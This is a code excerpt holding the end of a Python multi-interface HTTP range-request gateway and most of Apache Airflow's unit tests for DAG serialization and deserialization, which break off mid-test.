defaultLoadRate, 1 - defaultLoadRate # Send GET requests over two connection as Range Requests def sendRangeRequest(): global RESPONSE defaultThread = threading.Thread(target=sendGetPrimary) if IS_SECOND_AVAILABLE and IS_ACCEPT_RANGE: mobileThread = threading.Thread(target=sendGetSecondary) mobileThread.start() defaultThread.start() defaultThread.join() if IS_SECOND_AVAILABLE and IS_ACCEPT_RANGE: mobileThread.join() print("----------------") RESPONSE = RESPONSE_PRIMARY + RESPONSE_SECOND # Send GET request over Primary Connection def sendGetPrimary(): log.info("*** Primary GET is started") global RESPONSE_PRIMARY headers = { "Host": REQUESTED_HOSTNAME, "Accept": "*/*", "User-Agent": "kibitzer", 'Connection': 'Close' } if IS_ACCEPT_RANGE: rangeValue = 'bytes=' + str(PRIMARY_RANGE_START) + '-' + str(PRIMARY_RANGE_END) headers.update({'Range': rangeValue}) if REQUESTED_PORT == 8080: URL = HTTP_VERSION + REQUESTED_HOSTNAME + ":8080" + REQUESTED_PATH else: URL = HTTP_VERSION + REQUESTED_HOSTNAME + REQUESTED_PATH RESPONSE_PRIMARY = req.get(URL, headers=headers, verify=True).content log.info("*** Primary GET is done") # Send GET request over Secondary Connection def sendGetSecondary(): log.info("--- Secondary GET is started") global RESPONSE_SECOND headers = { "Host": REQUESTED_HOSTNAME, "Accept": "*/*", "User-Agent": "kibitzer", 'Connection': 'Close' } if IS_ACCEPT_RANGE: rangeValue = "bytes=" + str(SECOND_RANGE_START) + "-" + str(SECOND_RANGE_END) headers.update({'Range': rangeValue}) if REQUESTED_PORT == 8080: URL = HTTP_VERSION + REQUESTED_HOSTNAME + ":8080" + REQUESTED_PATH else: URL = HTTP_VERSION + REQUESTED_HOSTNAME + REQUESTED_PATH s = req.Session() s.mount('http://', SourceAddressAdapter(SECOND_IP)) RESPONSE_SECOND = s.get(URL, headers=headers, verify=True).content log.info("--- Secondary GET is done") # Push back GET request responses to client def pushBackToClient(self): global REQUEST_HANDLE_TIME self.send_response(206) self.send_header('Content-Type', CONTENT_TYPE) self.send_header('Access-Control-Allow-Origin', '*') self.send_header('Content-Range', "bytes " + str(SEGMENT_SIZE) + "/" + str(CONTENT_LENGTH)) self.send_header('Content-Length', str(SEGMENT_SIZE)) self.end_headers() self.wfile.write(RESPONSE) # self.wfile.write(bytearray("asdasd", 'utf-8')) log.info("Response is pushed back to client") REQUEST_HANDLE_TIME = getCurrentTime() log.info("Total time passed: %s seconds", str(round(REQUEST_HANDLE_TIME - REQUEST_RECV_TIME, 2))) def getCurrentTime(): return datetime.now(timezone.utc).timestamp() def convertToMb(num): return num / (1024 * 1024) class Proxy(SimpleHTTPRequestHandler): protocol_version = "HTTP/1.1" def do_GET(self): global REQUEST_RECV_TIME if self.path.startswith("/http"): log.info("Gateway got a new request") REQUEST_RECV_TIME = getCurrentTime() handleRequest(self) log.info("---------------------------------------------------------------------\n") else: log.error("Undefined format") log.basicConfig(filename='D:\\PyCharm Projects\\Senior\\src\\log_records\\gateway_v2.log', level=log.DEBUG, format='%(asctime)s - %(message)s') connection = ThreadingHTTPServer((GATEWAY_IP, GATEWAY_PORT), Proxy) connection.serve_forever()
test_dag_serialization.py
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """Unit tests for stringified DAGs.""" import importlib import importlib.util import multiprocessing import os import unittest from datetime import datetime, timedelta, timezone from glob import glob from unittest import mock import pendulum import pytest from dateutil.relativedelta import FR, relativedelta from kubernetes.client import models as k8s from parameterized import parameterized from airflow.hooks.base import BaseHook from airflow.kubernetes.pod_generator import PodGenerator from airflow.models import DAG, Connection, DagBag, TaskInstance from airflow.models.baseoperator import BaseOperator, BaseOperatorLink from airflow.operators.bash import BashOperator from airflow.security import permissions from airflow.serialization.json_schema import load_dag_schema_dict from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG from airflow.timetables.simple import NullTimetable, OnceTimetable from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink from tests.test_utils.timetables import cron_timetable, delta_timetable executor_config_pod = k8s.V1Pod( metadata=k8s.V1ObjectMeta(name="my-name"), spec=k8s.V1PodSpec( containers=[ k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")]) ] ), ) serialized_simple_dag_ground_truth = { "__version": 1, "dag": { "default_args": { "__type": "dict", "__var": { "depends_on_past": False, "retries": 1, "retry_delay": {"__type": "timedelta", "__var": 300.0}, "max_retry_delay": {"__type": "timedelta", "__var": 600.0}, "sla": {"__type": "timedelta", "__var": 100.0}, }, }, "start_date": 1564617600.0, '_task_group': { '_group_id': None, 'prefix_group_id': True, 'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')}, 'tooltip': '', 'ui_color': 'CornflowerBlue', 'ui_fgcolor': '#000', 'upstream_group_ids': [], 'downstream_group_ids': [], 'upstream_task_ids': [], 'downstream_task_ids': [], }, "is_paused_upon_creation": False, "_dag_id": "simple_dag", "doc_md": "### DAG Tutorial Documentation", "fileloc": None, "tasks": [ { "task_id": "bash_task", "owner": "airflow", "retries": 1, "retry_delay": 300.0, "max_retry_delay": 600.0, "sla": 100.0, "_downstream_task_ids": [], "_inlets": [], "_is_dummy": False, "_outlets": [], "ui_color": "#f0ede4", "ui_fgcolor": "#000", "template_fields": ['bash_command', 'env'], "template_fields_renderers": {'bash_command': 'bash', 'env': 'json'}, "bash_command": "echo {{ task.task_id }}", 'label': 'bash_task', "_task_type": "BashOperator", "_task_module": "airflow.operators.bash", "pool": "default_pool", "executor_config": { '__type': 'dict', '__var': { "pod_override": { '__type': 'k8s.V1Pod', '__var': PodGenerator.serialize_pod(executor_config_pod), } }, }, "doc_md": "### Task Tutorial Documentation", }, { "task_id": "custom_task", "retries": 1, "retry_delay": 300.0, "max_retry_delay": 600.0, "sla": 100.0, "_downstream_task_ids": [], "_inlets": [], "_is_dummy": False, "_outlets": [], "_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}], "ui_color": "#fff", "ui_fgcolor": "#000", "template_fields": ['bash_command'], "template_fields_renderers": {}, "_task_type": "CustomOperator", "_task_module": "tests.test_utils.mock_operators", "pool": "default_pool", 'label': 'custom_task', }, ], "timezone": "UTC", "_access_control": { "__type": "dict", "__var": { "test_role": { "__type": "set", "__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT], } }, }, "edge_info": {}, "dag_dependencies": [], }, } ROOT_FOLDER = os.path.realpath( os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir) ) def make_example_dags(module_path): """Loads DAGs from a module for test.""" dagbag = DagBag(module_path) return dagbag.dags def make_simple_dag(): """Make very simple DAG to verify serialization result.""" with DAG( dag_id='simple_dag', default_args={ "retries": 1, "retry_delay": timedelta(minutes=5), "max_retry_delay": timedelta(minutes=10), "depends_on_past": False, "sla": timedelta(seconds=100), }, start_date=datetime(2019, 8, 1), is_paused_upon_creation=False, access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}}, doc_md="### DAG Tutorial Documentation", ) as dag: CustomOperator(task_id='custom_task') BashOperator( task_id='bash_task', bash_command='echo {{ task.task_id }}', owner='airflow', executor_config={"pod_override": executor_config_pod}, doc_md="### Task Tutorial Documentation", ) return {'simple_dag': dag} def make_user_defined_macro_filter_dag(): """Make DAGs with user defined macros and filters using locally defined methods. For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``. The examples here test: (1) functions can be successfully displayed on UI; (2) templates with function macros have been rendered before serialization. """ def compute_next_execution_date(dag, execution_date): return dag.following_schedule(execution_date) default_args = {'start_date': datetime(2019, 7, 10)} dag = DAG( 'user_defined_macro_filter_dag', default_args=default_args, user_defined_macros={ 'next_execution_date': compute_next_execution_date, }, user_defined_filters={'hello': lambda name: f'Hello {name}'}, catchup=False, ) BashOperator( task_id='echo', bash_command='echo "{{ next_execution_date(dag, execution_date) }}"', dag=dag, ) return {dag.dag_id: dag} def collect_dags(dag_folder=None): """Collects DAGs to test.""" dags = {} dags.update(make_simple_dag()) dags.update(make_user_defined_macro_filter_dag()) if dag_folder: if isinstance(dag_folder, (list, tuple)): patterns = dag_folder else: patterns = [dag_folder] else: patterns = [ "airflow/example_dags", "airflow/providers/*/example_dags", "airflow/providers/*/*/example_dags", ] for pattern in patterns: for directory in glob(f"{ROOT_FOLDER}/{pattern}"): dags.update(make_example_dags(directory)) # Filter subdags as they are stored in same row in Serialized Dag table dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag} return dags def serialize_subprocess(queue, dag_folder): """Validate pickle in a subprocess.""" dags = collect_dags(dag_folder) for dag in dags.values(): queue.put(SerializedDAG.to_json(dag)) queue.put(None) class TestStringifiedDAGs(unittest.TestCase): """Unit tests for stringified DAGs.""" def setUp(self): super().setUp() BaseHook.get_connection = mock.Mock( return_value=Connection( extra=( '{' '"project_id": "mock", ' '"location": "mock", ' '"instance": "mock", ' '"database_type": "postgres", ' '"use_proxy": "False", ' '"use_ssl": "False"' '}' ) ) ) self.maxDiff = None def test_serialization(self): """Serialization and deserialization should work for every DAG and Operator.""" dags = collect_dags() serialized_dags = {} for _, v in dags.items(): dag = SerializedDAG.to_dict(v) SerializedDAG.validate_schema(dag) serialized_dags[v.dag_id] = dag # Compares with the ground truth of JSON string. self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth) def validate_serialized_dag(self, json_dag, ground_truth_dag): """Verify serialized DAGs match the ground truth.""" assert json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py' json_dag['dag']['fileloc'] = None def sorted_serialized_dag(dag_dict: dict): """ Sorts the "tasks" list and "access_control" permissions in the serialised dag python dictionary. This is needed as the order of items should not matter but assertEqual would fail if the order of items changes in the dag dictionary """ dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys())) dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted( dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] ) return dag_dict assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag) def test_deserialization_across_process(self): """A serialized DAG can be deserialized in another process.""" # Since we need to parse the dags twice here (once in the subprocess, # and once here to get a DAG to compare to) we don't want to load all # dags. queue = multiprocessing.Queue() proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags")) proc.daemon = True proc.start() stringified_dags = {} while True: v = queue.get() if v is None: break dag = SerializedDAG.from_json(v) assert isinstance(dag, DAG) stringified_dags[dag.dag_id] = dag dags = collect_dags("airflow/example_dags") assert set(stringified_dags.keys()) == set(dags.keys()) # Verify deserialized DAGs. for dag_id in stringified_dags: self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id]) def test_roundtrip_provider_example_dags(self): dags = collect_dags( [ "airflow/providers/*/example_dags", "airflow/providers/*/*/example_dags", ] ) # Verify deserialized DAGs. for dag in dags.values(): serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag)) self.validate_deserialized_dag(serialized_dag, dag) def validate_deserialized_dag(self, serialized_dag, dag): """ Verify that all example DAGs work with DAG Serialization by checking fields between Serialized Dags & non-Serialized Dags """ fields_to_check = dag.get_serialized_fields() - { # Doesn't implement __eq__ properly. Check manually 'timezone', # Need to check fields in it, to exclude functions 'default_args', "_task_group", } for field in fields_to_check: assert getattr(serialized_dag, field) == getattr( dag, field ), f'{dag.dag_id}.{field} does not match' if dag.default_args: for k, v in dag.default_args.items(): if callable(v): # Check we stored _something_. assert k in serialized_dag.default_args else: assert ( v == serialized_dag.default_args[k] ), f'{dag.dag_id}.default_args[{k}] does not match' assert serialized_dag.timezone.name == dag.timezone.name for task_id in dag.task_ids: self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id)) # Verify that the DAG object has 'full_filepath' attribute # and is equal to fileloc assert serialized_dag.full_filepath == dag.fileloc def validate_deserialized_task( self, serialized_task, task, ): """Verify non-airflow operators are casted to BaseOperator.""" assert isinstance(serialized_task, SerializedBaseOperator) assert not isinstance(task, SerializedBaseOperator) assert isinstance(task, BaseOperator) fields_to_check = task.get_serialized_fields() - { # Checked separately '_task_type', 'subdag', # Type is excluded, so don't check it '_log', # List vs tuple. Check separately 'template_fields', # We store the string, real dag has the actual code 'on_failure_callback', 'on_success_callback', 'on_retry_callback', # Checked separately 'resources', } assert serialized_task.task_type == task.task_type assert set(serialized_task.template_fields) == set(task.template_fields) assert serialized_task.upstream_task_ids == task.upstream_task_ids assert serialized_task.downstream_task_ids == task.downstream_task_ids for field in fields_to_check: assert getattr(serialized_task, field) == getattr( task, field ), f'{task.dag.dag_id}.{task.task_id}.{field} does not match' if serialized_task.resources is None: assert task.resources is None or task.resources == [] else: assert serialized_task.resources == task.resources # Check that for Deserialised task, task.subdag is None for all other Operators # except for the SubDagOperator where task.subdag is an instance of DAG object if task.task_type == "SubDagOperator": assert serialized_task.subdag is not None assert isinstance(serialized_task.subdag, DAG) else: assert serialized_task.subdag is None @parameterized.expand( [ (datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)), ( datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 8, 2, tzinfo=timezone.utc), datetime(2019, 8, 2, tzinfo=timezone.utc), ), ( datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 7, 30, tzinfo=timezone.utc), datetime(2019, 8, 1, tzinfo=timezone.utc), ), (pendulum.datetime(2019, 8, 1, tz='UTC'), None, pendulum.datetime(2019, 8, 1, tz='UTC')), ] ) def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date): dag = DAG(dag_id='simple_dag', start_date=dag_start_date) BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date) serialized_dag = SerializedDAG.to_dict(dag) if not task_start_date or dag_start_date >= task_start_date: # If dag.start_date > task.start_date -> task.start_date=dag.start_date # because of the logic in dag.add_task() assert "start_date" not in serialized_dag["dag"]["tasks"][0] else: assert "start_date" in serialized_dag["dag"]["tasks"][0] dag = SerializedDAG.from_dict(serialized_dag) simple_task = dag.task_dict["simple_task"] assert simple_task.start_date == expected_task_start_date def test_deserialization_with_dag_context(self): with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag: BaseOperator(task_id='simple_task') # should not raise RuntimeError: dictionary changed size during iteration SerializedDAG.to_dict(dag) @parameterized.expand( [ (datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)), ( datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 8, 2, tzinfo=timezone.utc), datetime(2019, 8, 1, tzinfo=timezone.utc), ), ( datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 7, 30, tzinfo=timezone.utc), datetime(2019, 7, 30, tzinfo=timezone.utc), ), ] ) def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date): dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date) BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date) serialized_dag = SerializedDAG.to_dict(dag) if not task_end_date or dag_end_date <= task_end_date: # If dag.end_date < task.end_date -> task.end_date=dag.end_date # because of the logic in dag.add_task() assert "end_date" not in serialized_dag["dag"]["tasks"][0] else: assert "end_date" in serialized_dag["dag"]["tasks"][0] dag = SerializedDAG.from_dict(serialized_dag) simple_task = dag.task_dict["simple_task"] assert simple_task.end_date == expected_task_end_date @parameterized.expand( [ (None, None, NullTimetable()), ("@weekly", "@weekly", cron_timetable("0 0 * * 0")), ("@once", "@once", OnceTimetable()), ( {"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), delta_timetable(timedelta(days=1)), ), ] ) def test_deserialization_schedule_interval( self, serialized_schedule_interval, expected_schedule_interval, expected_timetable, ): serialized = { "__version": 1, "dag": { "default_args": {"__type": "dict", "__var": {}}, "_dag_id": "simple_dag", "fileloc": __file__, "tasks": [], "timezone": "UTC", "schedule_interval": serialized_schedule_interval, }, } SerializedDAG.validate_schema(serialized) dag = SerializedDAG.from_dict(serialized) assert dag.schedule_interval == expected_schedule_interval assert dag.timetable == expected_timetable @parameterized.expand( [ (relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}), (relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}), # Every friday (relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}), # Every second friday (relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}), ] ) def test_roundtrip_relativedelta(self, val, expected): serialized = SerializedDAG._serialize(val) assert serialized == expected round_tripped = SerializedDAG._deserialize(serialized) assert val == round_tripped @parameterized.expand( [ (None, {}), ({"param_1": "value_1"}, {"param_1": "value_1"}), ] ) def test_dag_params_roundtrip(self, val, expected_val): """ Test that params work both on Serialized DAGs & Tasks """ dag = DAG(dag_id='simple_dag', params=val) BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1)) serialized_dag = SerializedDAG.to_dict(dag) if val: assert "params" in serialized_dag["dag"] else: assert "params" not in serialized_dag["dag"] deserialized_dag = SerializedDAG.from_dict(serialized_dag) deserialized_simple_task = deserialized_dag.task_dict["simple_task"] assert expected_val == deserialized_dag.params assert expected_val == deserialized_simple_task.params @parameterized.expand( [ (None, {}), ({"param_1": "value_1"}, {"param_1": "value_1"}), ] ) def test_task_params_roundtrip(self, val, expected_val): """ Test that params work both on Serialized DAGs & Tasks """ dag = DAG(dag_id='simple_dag') BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1)) serialized_dag = SerializedDAG.to_dict(dag) if val: assert "params" in serialized_dag["dag"]["tasks"][0] else: assert "params" not in serialized_dag["dag"]["tasks"][0] deserialized_dag = SerializedDAG.from_dict(serialized_dag) deserialized_simple_task = deserialized_dag.task_dict["simple_task"] assert expected_val == deserialized_simple_task.params def test_extra_serialized_field_and_operator_links(self): """ Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links. This tests also depends on GoogleLink() registered as a plugin in tests/plugins/test_plugin.py The function tests that if extra operator links are registered in plugin in ``operator_extra_links`` and the same is also defined in the Operator in ``BaseOperator.operator_extra_links``, it has the correct extra link. """ test_date = datetime(2019, 8, 1) dag = DAG(dag_id='simple_dag', start_date=test_date) CustomOperator(task_id='simple_task', dag=dag, bash_command="true") serialized_dag = SerializedDAG.to_dict(dag) assert "bash_command" in serialized_dag["dag"]["tasks"][0] dag = SerializedDAG.from_dict(serialized_dag) simple_task = dag.task_dict["simple_task"] assert getattr(simple_task, "bash_command") == "true" ######################################################### # Verify Operator Links work with Serialized Operator ######################################################### # Check Serialized version of operator link only contains the inbuilt Op Link assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [ {'tests.test_utils.mock_operators.CustomOpLink': {}} ] # Test all the extra_links are set assert set(simple_task.extra_links) == {'Google Custom', 'airflow', 'github', 'google'} ti = TaskInstance(task=simple_task, execution_date=test_date) ti.xcom_push('search_query', "dummy_value_1") # Test Deserialized inbuilt link custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name) assert 'http://google.com/custom_base_link?search=dummy_value_1' == custom_inbuilt_link # Test Deserialized link registered via Airflow Plugin google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name) assert "https://www.google.com" == google_link_from_plugin def test_extra_operator_links_logs_error_for_non_registered_extra_links(self): """ Assert OperatorLinks not registered via Plugins and if it is not an inbuilt Operator Link, it can still deserialize the DAG (does not error) but just logs an error """ class TaskStateLink(BaseOperatorLink): """OperatorLink not registered via Plugins nor a built-in OperatorLink""" name = 'My Link' def get_link(self, operator, dttm): return 'https://www.google.com' class MyOperator(BaseOperator): """Just a DummyOperator using above defined Extra Operator Link""" operator_extra_links = [TaskStateLink()] def execute(self, context): pass with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag: MyOperator(task_id='blah') serialized_dag = SerializedDAG.to_dict(dag) with self.assertLogs("airflow.serialization.serialized_objects", level="ERROR") as log_output: SerializedDAG.from_dict(serialized_dag) received_logs = log_output.output[0] expected_err_msg = ( "Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' " "not registered" ) assert expected_err_msg in received_logs def test_extra_serialized_field_and_multiple_operator_links(self): """ Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links. This tests also depends on GoogleLink() registered as a plugin in tests/plugins/test_plugin.py The function tests that if extra operator links are registered in plugin in ``operator_extra_links`` and the same is also defined in the Operator in ``BaseOperator.operator_extra_links``, it has the correct extra link. """ test_date = datetime(2019, 8, 1) dag = DAG(dag_id='simple_dag', start_date=test_date) CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"]) serialized_dag = SerializedDAG.to_dict(dag) assert "bash_command" in serialized_dag["dag"]["tasks"][0] dag = SerializedDAG.from_dict(serialized_dag) simple_task = dag.task_dict["simple_task"] assert getattr(simple_task, "bash_command") == ["echo", "true"] ######################################################### # Verify Operator Links work with Serialized Operator ######################################################### # Check Serialized version of operator link only contains the inbuilt Op Link assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [ {'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}}, {'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}}, ] # Test all the extra_links are set assert set(simple_task.extra_links) == { 'BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google', } ti = TaskInstance(task=simple_task, execution_date=test_date) ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"]) # Test Deserialized inbuilt link #1 custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1") assert 'https://console.cloud.google.com/bigquery?j=dummy_value_1' == custom_inbuilt_link # Test Deserialized inbuilt link #2 custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2") assert 'https://console.cloud.google.com/bigquery?j=dummy_value_2' == custom_inbuilt_link # Test Deserialized link registered via Airflow Plugin google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name) assert "https://www.google.com" == google_link_from_plugin class ClassWithCustomAttributes: """ Class for testing purpose: allows to create objects with custom attributes in one single statement. """ def __init__(self, **kwargs): for key, value in kwargs.items(): setattr(self, key, value) def __str__(self): return f"{self.__class__.__name__}({str(self.__dict__)})" def __repr__(self): return self.__str__() def __eq__(self, other): return self.__dict__ == other.__dict__ def __ne__(self, other): return not self.__eq__(other) @parameterized.expand( [ (None, None), ([], []), ({}, {}), ("{{ task.task_id }}", "{{ task.task_id }}"), (["{{ task.task_id }}", "{{ task.task_id }}"]), ({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}), ({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}), ( [{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}], [{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}], ), ( {"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}}, {"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}}, ), ( ClassWithCustomAttributes( att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"] ), "ClassWithCustomAttributes(" "{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})", ), ( ClassWithCustomAttributes( nested1=ClassWithCustomAttributes( att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"] ), nested2=ClassWithCustomAttributes( att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"] ), template_fields=["nested1"], ), "ClassWithCustomAttributes(" "{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', " "'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), " "'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': " "'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})", ), ] ) def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field): """ Test that templated_fields exists for all Operators in Serialized DAG Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.) we want check that non-"basic" objects are turned in to strings after deserializing. """ dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1)) with dag: BashOperator(task_id="test", bash_command=templated_field) serialized_dag = SerializedDAG.to_dict(dag) deserialized_dag = SerializedDAG.from_dict(serialized_dag) deserialized_test_task = deserialized_dag.task_dict["test"] assert expected_field == getattr(deserialized_test_task, "bash_command") def test_dag_serialized_fields_with_schema(self): """ Additional Properties are disabled on DAGs. This test verifies that all the keys in DAG.get_serialized_fields are listed in Schema definition. """ dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"] # The parameters we add manually in Serialization needs to be ignored ignored_keys: set = { "is_subdag", "tasks", "has_on_success_callback", "has_on_failure_callback", "dag_dependencies", } keys_for_backwards_compat: set = { "_concurrency", } dag_params: set = set(dag_schema.keys()) - ignored_keys - keys_for_backwards_compat assert set(DAG.get_serialized_fields()) == dag_params def test_operator_subclass_changing_base_defaults(self): assert ( BaseOperator(task_id='dummy').do_xcom_push is True ), "Precondition check! If this fails the test won't make sense" class MyOperator(BaseOperator): def __init__(self, do_xcom_push=False, **kwargs): super().__init__(**kwargs) self.do_xcom_push = do_xcom_push op = MyOperator(task_id='dummy') assert op.do_xcom_push is False blob = SerializedBaseOperator.serialize_operator(op) serialized_op = SerializedBaseOperator.deserialize_operator(blob) assert serialized_op.do_xcom_push is False def test_no_new_fields_added_to_base_operator(self): """ This test verifies that there are no new fields added to BaseOperator. And reminds that tests should be added for it. """ base_operator = BaseOperator(task_id="10") fields = base_operator.__dict__ assert { '_BaseOperator__instantiated': True, '_dag': None, '_downstream_task_ids': set(), '_inlets': [], '_log': base_operator.log, '_outlets': [], '_upstream_task_ids': set(), 'depends_on_past': False, 'do_xcom_push': True, 'doc': None, 'doc_json': None, 'doc_md': None, 'doc_rst': None, 'doc_yaml': None, 'email': None, 'email_on_failure': True, 'email_on_retry': True, 'end_date': None, 'execution_timeout': None, 'executor_config': {}, 'inlets': [], 'label': '10', 'max_retry_delay': None, 'on_execute_callback': None, 'on_failure_callback': None, 'on_retry_callback': None, 'on_success_callback': None, 'outlets': [], 'owner': 'airflow', 'params': {}, 'pool': 'default_pool', 'pool_slots': 1, 'priority_weight': 1, 'queue': 'default', 'resources': None, 'retries': 0, 'retry_delay': timedelta(0, 300), 'retry_exponential_backoff': False, 'run_as_user': None, 'sla': None, 'start_date': None, 'subdag': None, 'task_concurrency': None, 'task_id': '10', 'trigger_rule': 'all_success', 'wait_for_downstream': False, 'weight_rule': 'downstream', } == fields, """ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY Some fields were added to the BaseOperator! Please add them to the list above and make sure that you add support for DAG serialization - you should add the field to `airflow/serialization/schema.json` - they should have correct type defined there. Note that we do not support versioning yet so you should only add optional fields to BaseOperator. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! """ def test_task_group_serialization(self): """ Test TaskGroup serialization/deserialization. """ from airflow.operators.dummy import DummyOperator from airflow.utils.task_group import TaskGroup execution_date = datetime(2020, 1, 1) with DAG("test_task_group_serialization", start_date=execution_date) as dag: task1 = DummyOperator(task_id="task1") with TaskGroup("group234") as group234: _ = DummyOperator(task_id="task2") with TaskGroup("group34") as group34: _ = DummyOperator(task_id="task3") _ = DummyOperator(task_id="task4") task5 = DummyOperator(task_id="task5") task1 >> group234 group34 >> task5 dag_dict = SerializedDAG.to_dict(dag) SerializedDAG.validate_schema(dag_dict) json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag)) self.validate_deserialized_dag(json_dag, dag) serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag)) assert serialized_dag.task_group.children assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys() def check_task_group(node): try: children = node.children.values() except AttributeError: # Round-trip serialization and check the result expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id)) expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized) expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized) assert node assert SerializedBaseOperator.serialize_operator(node) == expected_dict return for child in children: check_task_group(child) check_task_group(serialized_dag.task_group) def test_edge_info_serialization(self): """ Tests edge_info serialization/deserialization. """ from airflow.operators.dummy import DummyOperator from airflow.utils.edgemodifier import Label with DAG("test_edge_info_serialization", start_date=datetime(2020, 1, 1)) as dag: task1 = DummyOperator(task_id="task1") task2 = DummyOperator(task_id="task2") task1 >> Label("test label") >> task2 dag_dict = SerializedDAG.to_dict(dag) SerializedDAG.validate_schema(dag_dict) json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag)) 